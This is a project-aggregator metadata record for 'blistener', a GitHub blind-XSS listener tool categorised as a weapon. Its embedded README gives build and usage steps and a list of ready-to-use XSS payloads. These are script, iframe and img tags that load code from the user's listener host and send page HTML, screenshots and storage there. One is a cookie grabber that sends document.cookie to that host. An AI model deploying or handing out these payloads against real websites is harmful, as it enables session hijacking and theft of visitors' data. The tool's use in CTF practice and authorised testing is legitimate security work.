{"id":13762784,"url":"https://github.com/fyxme/blistener","last_synced_at":"2025-04-14T23:06:24.241Z","repository":{"id":202287897,"uuid":"393935628","full_name":"fyxme/blistener","owner":"fyxme","description":"Blind-XSS listener with payloads to the target user's browser data including cookies, local/session storage, html code, screenshot of current page (HTTP listener optionally)","archived":false,"fork":false,"pushed_at":"2024-10-10T20:13:30.000Z","size":4442,"stargazers_count":8,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-04-14T23:06:01.613Z","etag":null,"topics":["blind-xss","golang","http","http-listener","javascript","listener","payloads","xss"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/fyxme.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-08-08T10:56:44.000Z","updated_at":"2024-10-10T20:13:34.000Z","dependencies_parsed_at":null,"dependency_job_id":"871721c3-2ffc-406d-acf1-3700a2b2929c","html_url":"https://github.com/fyxme/blistener","commit_stats":null,"previous_names":["fyxme/blistener"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fyxme%2Fblistener","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fyxme%2Fblistener/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fyxme%2Fblistener/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/fyxme%2Fblistener/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/fyxme","download_url":"https://codeload.github.com/fyxme/blistener/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248975316,"owners_count":21192209,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blind-xss","golang","http","http-listener","javascript","listener","payloads","xss"],"created_at":"2024-08-03T14:00:57.415Z","updated_at":"2025-04-14T23:06:24.215Z","avatar_url":"https://github.com/fyxme.png","language":"Go","funding_links":[],"categories":["Weapons"],"sub_categories":["Tools"],"readme":"# Blistener (Blind-XSS listener)\n\nCode was written quickly during a CTF and should probably be refactored. Not going to change it for now since it's working. I'll refactor when I add new features to it.\n\nIt has 2 exploits, one which will take all data available on the page including the html code and the other which will also take a screenshot of the page as well as all the data on the page.\n\n\n## Compiling\n\n```\ngo build blistener.go\n```\n\n## Usage\n\n1. Create an output directory where the listener will store html code and png images from the xss pages it identifies\n\n2. Start the listener:\n```\n./blistener\n```\n\n3. Use one of the payloads to trigger an XSS \n\n## Exploit strings\n\n\n```\n# The normal payloads will grab all content from the page including the html source\n\u003cscript src=\"http://\u003cyour host or ip\u003e:8899/payload.js\"\u003e\u003c/script\u003e\n\u003ciframe src=\"http://\u003cyour host or ip\u003e:8899/iframe.html\"\u003e\u003c/iframe\u003e\n\n\n# The extended payloads do the same as the normal payloads except that they also take a screenshot of the page \n\u003cscript src=\"http://\u003cyour host or ip\u003e:8899/payload-ext.js\"\u003e\u003c/script\u003e\n\u003ciframe src=\"http://\u003cyour host or ip\u003e:8899/iframe-ext.html\"\u003e\u003c/iframe\u003e\n\n# You call also use a normal request to make sure the XSS can be trigger such as:\n\u003cimg src=\"http://\u003cyour host or ip\u003e:8899/\" /\u003e\n\n# Simple cookie grabber\n\u003cimg src=x onerror=\"new Image().src = `http://\u003cyour host or ip\u003e:8899/?c=${document.cookie}`\" /\u003e\n```\n\n_Note: The listener is on port 8899 by default, change to another port if you need._\n\n\n## Example trigger\n\n![example trigger](.github/img/example.png)\n\n\n## Todo\n\n- Add cli flags\n- Refactor code\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffyxme%2Fblistener","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffyxme%2Fblistener","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffyxme%2Fblistener/lists"}